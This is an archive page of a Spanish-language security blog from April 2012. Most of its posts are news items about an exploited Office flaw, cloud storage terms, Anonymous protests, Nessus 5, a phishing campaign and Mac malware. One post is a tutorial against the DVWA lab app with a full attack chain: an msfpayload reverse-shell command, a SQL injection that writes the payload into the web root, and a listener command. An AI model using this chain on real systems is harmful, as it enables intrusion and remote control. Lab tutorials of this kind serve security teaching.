Vulnerabilidad en Office está siendo explotada para propagar malware

abril 30, 2012 § Deja un comentario

El pasado 10 de abril Microsoft lanzó una serie de actualizaciones para sus productos, entre ellas un parche en el que se cerraba un fallo de seguridad crítico en Microsoft Office. Aunque en ese entonces no se tenían ningún informe de ataques a través de esta vulnerabilidad, investigadores de McAfee han reportado que la misma ya está siendo explotada para infectar usuarios.

De acuerdo con la firma de seguridad, se han descubierto una serie de archivos malignos en formato RTF, Word y Excel que son distribuidos a través de correo electrónico y que se caracterizan por tener un objeto OLE incrustado. Basta con que la víctima abra el documento para que la vulnerabilidad sea explotada y con ello se instale un troyano en el sistema.

Según explica McAfee, al momento de que se abre el documento malicioso se explota la vulnerabilidad y se ejecuta una shellcode del archivo OLE, la cual tiene como finalidad la instalación del malware. Sin embargo, para despistar a la víctima, la misma shellcode también inicia un nuevo documento de Word, y debido a esto los usuarios pueden percatarse como Word o Excel primero se cierra e inmediatamente vuelve a ejecutarse para mostrar un documento en blanco.

Así que, nuevamente les recomendamos a los usuarios instalar cuanto antes los últimos parches de seguridad de Microsoft, los cuales están disponible en la página de Windows Update o mediante la herramienta de actualizaciones automáticas. Además de la suite ofimática, cabe recordar que también se solucionaron diferentes fallos de categoría crítica en todas las versiones de Windows e Internet Explorer.

Fuente: Open Security

Anuncios

Comparación de condiciones de almacenamiento en la nube

abril 30, 2012 § 2 comentarios

Según esta comparación, los términos estándar de Google son especialmente graves en el contexto de almacenamiento en la nube personal.

Dropbox

https://www.dropbox.com/terms

“By using our Services you provide us with information, files, and folders that you submit to Dropbox (together, “your stuff”). You retain full ownership to your stuff. We don’t claim any ownership to any of it. These Terms do not grant us any rights to your stuff or intellectual property except for the limited rights that are needed to run the Services, as explained below.”

“Mediante el uso de nuestros servicios Ud. nos proporciona información, archivos y carpetas que envía a Dropbox (todo juntos, “sus cosas”). Usted conservará la plena propiedad de sus cosas. Nosotros no reclamamos la titularidad de ninguno de ellos. Estas Condiciones no nos conceden ningún derecho sobre sus cosas o su propiedad intelectual a excepción de los derechos limitados que son necesarios para ejecutar los servicios, tal como se explica a continuación. “

SkyDrive

http://windows.microsoft.com/en-US/windows-live/microsoft-service-agreement?SignedIn=1

“Except for material that we license to you, we don’t claim ownership of the content you provide on the service. Your content remains your content. We also don’t control, verify, or endorse the content that you and others make available on the service.”

“Microsoft no reclama la propiedad del contenido que usted proporcione en el servicio, excepto de aquél cuya licencia le haya concedido. El contenido seguirá siendo de su propiedad. Microsoft tampoco controla, comprueba ni aprueba el contenido que usted y otros usuarios pongan a disposición en el servicio.”

You understand that Microsoft may need, and you hereby grant Microsoft the right, to use, modify, adapt, reproduce, distribute, and display content posted on the service solely to the extent necessary to provide the service.

“Usted entiende que Microsoft puede necesitar usar, modificar, adaptar, reproducir, distribuir y mostrar contenido publicado en el servicio exclusivamente hasta el límite necesario para prestar el servicio, y por la presente concede a Microsoft estos derechos.”

Google Drive

http://www.google.com/intl/en/policies/terms/

“You retain ownership of any intellectual property rights that you hold in that content. In short, what belongs to you stays yours.

When you upload or otherwise submit content to our Services, you give Google (and those we work with) a worldwide license to use, host, store, reproduce, modify, create derivative works (such as those resulting from translations, adaptations or other changes we make so that your content works better with our Services), communicate, publish, publicly perform, publicly display and distribute such content.”

“Usted retiene la propiedad intelectual y los derechos sobre su contenido. En resumen, lo que le pertenece, se mantiene suyo.

Cuando cargue o someta su contenido a nuestros servicios, estará concediendo a Google (y con quienes trabajamos) una licencia mundial para utilizar, alojar, almacenar, reproducir, modificar, crear trabajos derivados (tales como las traducciones, adaptaciones o cambios que hacen que su contenido funcione mejor con nuestros Servicios), comunicar, publicar, ejecutar públicamente, mostrar públicamente y distribuir dicho contenido”.

En resumen lo que usted piense a Google no le importa.

Cristian de la Redacción de Segu-Info

#Anonymous anuncia Operation Defense Phase II contra #CISPA

abril 30, 2012 § Deja un comentario

Ya existe un nuevo video que anuncia la “Operation Defense Phase II” desde hoy primero de mayo hasta el 30 de junio (2 meses completos) para protestar contra la aprobación de CISPA.

En la primera fase de la operación se trató de un esfuerzo coordinado para protestar contra CISPA con diversas tácticas habituales para los “anónimos”. En el video se admite que los ataques DDoS ya no son tan efectivos porque muchas organizaciones han actualizado su red para manejar la afluencia de visitas.

Para ello, Anónimo propone un calendario para ocupar y protestar en forma física contra las corporaciones y los políticos que apoyan CISPA. Anónimo espera que las protestas sean similares que las que se hicieron contra la Iglesia de la Cienciología hace unos años.

Esto significa que ellos están buscando a gente para protestar en varios lugares que son propiedad de estas empresas, no sólo en una oficina corporativa o en un área general. En esencia, están llevando la lucha a los lugares que la gente visita normalmente.

Los objetivos de la protesta de dos meses de largo será de AT&T, IBM, Intel, Microsoft, Verizon, Bank of America, Chase Bank, McGraw-Hill, Pepsi, Coca-Cola, Target, Wal-Mart, CVS, MasterCard, Visa, y american Express. Cada protesta se establecerá entre determinadas fechas.

Fuente: WebProNews

Obtener una sesión meterpreter explotando SQL Injection

abril 30, 2012 § 2 comentarios

Hoy vamos a ver como obtener una sesión de Meteperter explotando una vulnerabilidad SQL Injectión, para recrear este ejemplo vamos a utilizar DVWA.

1. Creamos el payload:

msfpayload php/meterpreter/reverse_tcp LHOST=192.168.1.102 LPORT=10000 R > payload.php

2. Ahora este código lo tenemos que pasar la Hexadecimal. Para ello podéis emplear los multiples aplcaciones online que hay. Yo dejo las 2 que suelo usar:

http://ostermiller.org/calc/encode.html
http://www.seguridadwireless.net/php/conversor-universal-wireless.php

3. El codigo quedaría algo así:

233c3f7068700a0a6572726f725f7265706f7274696e672830...

4. Inyectamos el siguiente comando en la aplicación web:
' union select '',0x233c3f7068700a0a6572726f725f7265706f7274696e672830... into dumpfile '/opt/lampp/htdocs/uploads/payload.php'#

5. Nos quedamos escuchando para cuando se ejecuta el payload.

msfcli multi/handler PAYLOAD=php/meterpreter/reverse_tcp LHOST=192.168.1.102 LPORT=10000 E

5. Ahora si nos vamos al sitio el cual hemos subido el payload (/opt/lampp/htdocs/uploads/) y lo ejecutamos tendríamos que obtener la sesión Meterpreter.

6. Si volvemos a la pantalla donde hemos dejado escuchando vemos que tenemos una sesión Meterpreter.

Contenido completo en Red Orbita

Sacando provecho a Nessus 5

abril 30, 2012 § Deja un comentario

En esta entrada trataremos otra vez de cómo sacarle provecho a Nessus, en concreto vamos a comentar brevemente algunas de las mejoras que trae su nueva versión, Nessus 5 y algunas de sus posibles aplicaciones.

La instalación y configuración ahora es mucho más sencilla y puede realizarse a través de un panel de administración vía Web. Además han incluido una nueva clasificación para la criticidad de las vulnerabilidades, ahora las engloban en Info, Low, Medium, High y Critical. Hay diferentes novedades pero la que personalmente me ha llamado más la atención es la incorporación de nuevos filtros tanto para la creación de Informes (Reports) como de Políticas de escaneo (Policies).

Por ejemplo a la hora de crear una nueva política podemos seleccionar solo aquellos plugins para los que haya exploit en el Framework Metasploit, para ello deshabilitamos todos los plugins, creamos nuestros filtros exigiendo que cumpla lo que deseamos, los guardamos y al ir seleccionando las familias de plugins que queramos solo se habilitarán aquellos que cumplan con las opciones de filtrado.

Contenido completo en fuente original Security Art Work

Correo con engaño, geoposicionamiento y supuestas frases para Facebook

abril 30, 2012 § Deja un comentario

En los últimos días hemos recibidos varias denuncias de usuarios que reciben un correo con una simple frase y un enlace:

El correo parece provenir de direcciones “aleatorias” pero siempre desde personas que son contactos de quien recibe el correo, lo cual deja claro que alguien inicialmente cae en la trampa y posteriormente, de forma automática se comienzan a enviar correos a los contactos.

El sitio web al que se ingresa si se hace clic en el enlace tiene varias particularidades.

1. Se ejecuta un conocido script de geoposicionamiento (Maxmind) para ubicar el país de la víctima. En este caso podemos ver como ha se ha establecido mi posición:

Luego, se realiza una redirección de la víctima a otro sitio web donde se realiza el engaño y se roba información del usuario.

2.Se redirecciona al usuario a sitios distintos que puede depender del navegador o de alguna otra variable que el delincuente haya considerado.

Los sitios web destinos varían continuamente y pueden ir desde ser un caso de Phishing de Live/MSN/Hotmail, el cual roba las credenciales del usuario y luego redirige al usuario al sitio siguiente:

Un sitio que dice ofrecer frases para compartir en Facebook y que hasta el momento de escribir el presente,  ha tenido más de 13.000 ingresos:

Una vez más observamos como los usuarios son capaces de entregar su información a cambio de nada y con algo tan simple como haciendo clic en un enlace.

Cristian de la Redación de Segu-Info

Malware para Windows y Mac desarrollado en Pyton

abril 29, 2012 § Deja un comentario

Expertos de Sophos Labs han identificado un ataque de un nuevo malware dirigido a Mac y Windows y se aprovecha de la vulnerabilidad de seguridad en Java que permitió infectar a los usuarios con el troyano Flashback.

Los usuarios que visitan páginas web comprometidas pueden encontrarse en riesgo de infección a través de un exploit en Java que descarga un archivo ejecutable en Windows y un archivo en Python, si el sistema operativo es Mac OS (install_flash_player.py).

Esta secuencia de comandos Python actúa como una puerta trasera en Mac OS X, permitiendo a usuarios remotos enviar comandos, robar archivos y ejecutar acciones sin el conocimiento del usuario.

Cristian de la Redacción de Segu-Info

¿Dónde estoy?

Actualmente estás viendo los archivos para abril, 2012 en Seguridad Informática.